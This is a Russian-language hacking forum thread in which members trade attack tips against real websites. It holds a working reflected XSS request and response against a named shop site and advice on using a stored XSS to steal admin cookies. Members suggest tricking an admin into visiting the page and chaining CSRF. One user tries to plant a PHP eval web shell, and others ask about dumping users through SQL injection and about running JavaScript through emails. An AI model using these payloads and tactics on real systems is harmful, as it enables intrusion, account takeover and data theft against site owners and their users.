Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    Code:
    GET /captcha/?route=captcha"><script>prompt(947944)</script> HTTP/1.1
    Host: ssh-shop.in
    
    
    Code:
    HTTP/1.1 200 OK
    ...
    <a href="/index/language?set=en&location=/captcha/?route=captcha"><script>prompt(947944)</script>"><img src="/img/us.png" border="0" align="absmiddle" /></a>
    <a href="/index/language?set=ru&location=/captcha/?route=captcha"><script>prompt(947944)</script>"><img src="/img/ru.png" border="0" align="absmiddle" /></a>
    
     
    SaNDER likes this.
  2. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    Ребят) вопрос такой вообщем есть фича на сайте типо добления в blacklist мембера например который тебе не приятен) суть не в этом)
    Когда добовляешь мембера в блэк вылазит поле для ввода коментария ( ну мол потом когда заходишь на его страницу виден этот коментарий только тебе )
    Суть вопроса в том, вообщем я заметил что в это поле отлично вставляется html код и он работает .)
    Есть ли возможность что то придумать через html ...
    Сорри за идиотский вопрос 200 лет уже не занимался ничем подобным)) все позабыл)
     
  3. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    XSS же
     
    _________________________
    GroM88 likes this.
  4. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    909
    Reputations:
    863
    Возможно, скорее всего, он также виден админам, что может привести к выдиранию админских куков
     
    _________________________
    GroM88 likes this.
  5. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    Возможно, но думаю что врятли ибо если представить что например этого пользователя добавило в блэк хотя бы 100-200 человек, тогда админ зайдет на его страницу, он устанет читать различную по3б3нь возле его ника в профиле))
     
  6. {iddqd}

    {iddqd} Member

    Joined:
    22 Dec 2011
    Messages:
    170
    Likes Received:
    99
    Reputations:
    2
    через XSS можно сделать многое, вплоть до автоматической заливки шелла:
    http://forum.antichat.ru/threads/50646/#post-584229

    отлови http пакет во время добавления юзера в блек и инжектируй туда свой evil код
     
    GroM88 likes this.
  7. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    909
    Reputations:
    863
    Админа можно и попросить зайти на страницу, с мотивировать его чем либо!
     
    _________________________
    GroM88 likes this.
  8. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    Админа пригласить на страницу проблемы нет никакой)
    проблема у меня в том что в xss у меня нет как токовых знаний и практики)
    yarbabin, подсказал запилить <script>alert()</script>
    Вообщем вписал, никаких изменений не было)
    В профиле получается написан ник пользователя например ATMOSFERA (тут в скобочках отображается причина)
    В моем случае просто получились простые скобочки)
    Сорян что пишу куйню эту всю) но в xss вообще нет никаких познаний)
    Пните меня в нужное русло с подсказками) может какой еще код попробовать внедрить)
    Пробовал <?php eval($_REQUEST[c]); ?> запилить и вызвать http://site.ru/member.html?id=12547&c=phpinfo();
    Не получилось)) куйню наверно делаю))
     
  9. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,366
    Likes Received:
    610
    Reputations:
    1,101
    GroM88, Читай статьи по XSS.
     
    GroM88 likes this.
  10. gQd

    gQd New Member

    Joined:
    13 Jan 2013
    Messages:
    97
    Likes Received:
    0
    Reputations:
    0
    Через havij раскрутил скулю, в итоге нашлась одна база "information_schema" как не пытался найти данные пользователей, бесполезно, где могут хранится данные? сорри за нюбский вопрос, заранее благодарен за помощь.
     
  11. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25
    information_schema - системная база с системными таблицами, в ней нет юзеров. Основная база сайта - другая. И не факт что там будут данные пользователей.
     
    gQd likes this.
  12. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Ребятки такой вопрос. Возможно ли отослать письмо на маил почту @mail.ru с hml так что бы при получении его, получатель открыл и отработал JS. Но имеено при открывании его.
     
  13. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    Если у тебя актуальная xss то да
     
  14. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    а блин, вот этот момент я и упустил.
     
  15. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    Вообщем вернусь опять к вам за помощью по данному вопросу.
    Суть такова, xss то. а толку от нее никакого. Т.к. Админ при заходе на страницу пользователя которого я добавил в блэк не видит коментарий который я написал при добавлении этого пользователя к себе в блэк. Собственно, xss не вариант, т.к. работать она будет только с моего аккаунта.

    При добавлении кометария вида <? phpinfo(); ?>, php-инфо конешно же не выводится( но посмотрев исходный код страницы я обнаружил что код добавлися в таком виде <!--? phpinfo(); ?-->

    Подскажи что еще можно попробовать) Заранее очень благодарен...)
     
  16. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    916
    Reputations:
    363
    через CSRF сделать полноценную XSS
     
    _________________________
  17. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    какой движок?
     
  18. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    Чучуть поподробнее пжлст) или хотя ткните носом в пруф где описано как это делается...
    А то читать все..и практиковать уйдет куча времени... которого и так впринципе то нет(
    Индивидуальный, самописанный))
    Точнее сказал бы пару лет назад писали одни, а фичу с добавлением коментариев уже не так давно дописал другой)
    Заранее всем благодарен за помощь.
     
  19. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    PHP:
    http://www.matrasmax.ru/konfigurator/?on_page=15&price_active=0&height_active=0&type=&size=131&producer_46=on&producers=&price_from=0&price_to=12000&materials=&stronger1=ТУТ &stronger2=&text=&action=apply_filter
    Инъекция?
     
  20. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    Ребята, так понимаю там стоит какой то чудо фильтр на <? ...
    Мб есть у кого варианты как можно попробовать обойти данный фильтр?)